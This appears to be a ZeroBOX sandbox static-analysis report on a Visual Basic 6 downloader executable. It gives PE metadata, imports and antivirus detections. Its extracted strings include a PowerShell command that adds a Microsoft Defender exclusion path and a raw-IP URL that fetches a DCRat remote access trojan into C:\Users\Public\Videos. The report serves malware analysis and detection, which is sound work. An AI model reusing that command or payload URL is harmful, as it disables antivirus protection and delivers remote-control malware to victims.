Static | ZeroBOX

PE Compile Time

2023-06-12 01:53:49

PE Imphash

4fa2b5619374acaeb687b6af5efb6bd2

Sections

Name   Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text  0x00001000       0x00000f18    0x00001000        4.80915104147
.data  0x00002000       0x000002d8    0x00001000        0.0
.rsrc  0x00003000       0x00000894    0x00001000        1.82654515939

Resources

Name           Offset      Size        Language      Sub-language        File type
RT_ICON        0x00003354  0x00000128  LANG_NEUTRAL  SUBLANG_NEUTRAL     GLS_BINARY_LSB_FIRST
RT_ICON        0x00003354  0x00000128  LANG_NEUTRAL  SUBLANG_NEUTRAL     GLS_BINARY_LSB_FIRST
RT_ICON        0x00003354  0x00000128  LANG_NEUTRAL  SUBLANG_NEUTRAL     GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0x00003324  0x00000030  LANG_NEUTRAL  SUBLANG_NEUTRAL     data
RT_VERSION     0x00003150  0x000001d4  LANG_ENGLISH  SUBLANG_ENGLISH_US  data

Imports

Library MSVBVM60.DLL:
0x401000 _CIcos
0x401004 _adj_fptan
0x401008 __vbaFreeVar
0x40100c _adj_fdiv_m64
0x401010 _adj_fprem1
0x401014 __vbaSetSystemError
0x401018 _adj_fdiv_m32
0x40101c __vbaLateMemSt
0x401020 _adj_fdiv_m16i
0x401024 __vbaObjSetAddref
0x401028 _adj_fdivr_m16i
0x40102c _CIsin
0x401030 __vbaChkstk
0x401034 __vbaObjVar
0x401038 DllFunctionCall
0x40103c _adj_fpatan
0x401040 None
0x401044 _CIsqrt
0x401048 __vbaExceptHandler
0x40104c _adj_fprem
0x401050 _adj_fdivr_m64
0x401054 None
0x401058 __vbaFPException
0x40105c _CIlog
0x401060 _adj_fdiv_m32i
0x401064 _adj_fdivr_m32i
0x401068 __vbaStrCopy
0x40106c _adj_fdivr_m32
0x401070 _adj_fdiv_r
0x401074 None
0x401078 __vbaLateMemCall
0x40107c __vbaVarDup
0x401080 __vbaLateMemCallLd
0x401084 _CIatan
0x401088 _allmul
0x40108c _CItan
0x401090 _CIexp
0x401094 __vbaFreeStr
0x401098 __vbaFreeObj

!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
Project1
Project1
Project1
Module1
Project1
kernel32
VBA6.DLL
__vbaFreeObj
__vbaFreeStr
__vbaStrCopy
__vbaLateMemCallLd
__vbaLateMemSt
__vbaLateMemCall
__vbaObjVar
__vbaObjSetAddref
__vbaSetSystemError
__vbaFreeVar
__vbaVarDup
@*\AC:\Users\ivan_\Desktop\run file remote\Project1.vbp
cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Public
http://51.79.49.73/crc/dcrat.exe
C:\Users\Public\Videos\dcrat.exe
MSXML2.XMLHTTP
ADODB.Stream
responseBody
SaveToFile
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904B0
ProductName
Project1
FileVersion
ProductVersion
InternalName
OriginalFilename
dcr1.exe

Antivirus Signature

Bkav W32.AIDetectMalware
Lionic Clean
tehtris Clean
MicroWorld-eScan Gen:Variant.Tedy.380556
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes RiskWare.Agent.VB
VIPRE Gen:Variant.Tedy.380556
Sangfor Clean
K7AntiVirus Clean
BitDefender Gen:Variant.Tedy.380556
K7GW Clean
Cybereason malicious.d6da5f
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec Clean
Elastic malicious (high confidence)
ESET-NOD32 Clean
APEX Malicious
Paloalto Clean
Cynet Clean
Kaspersky Clean
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
TACHYON Clean
Sophos Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.6ff799ae9a28bb58
Emsisoft Gen:Variant.Tedy.380556 (B)
Ikarus Clean
GData Gen:Variant.Tedy.380556
Jiangmin Clean
Webroot Clean
Avira Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Tedy.D5CE8C
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac Gen:Variant.Tedy.380556
MAX malware (ai score=85)
DeepInstinct Clean
Cylance Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.300983.susgen
Fortinet Clean
AVG Clean
Avast Clean
CrowdStrike win/malicious_confidence_70% (W)
No IRMA results available.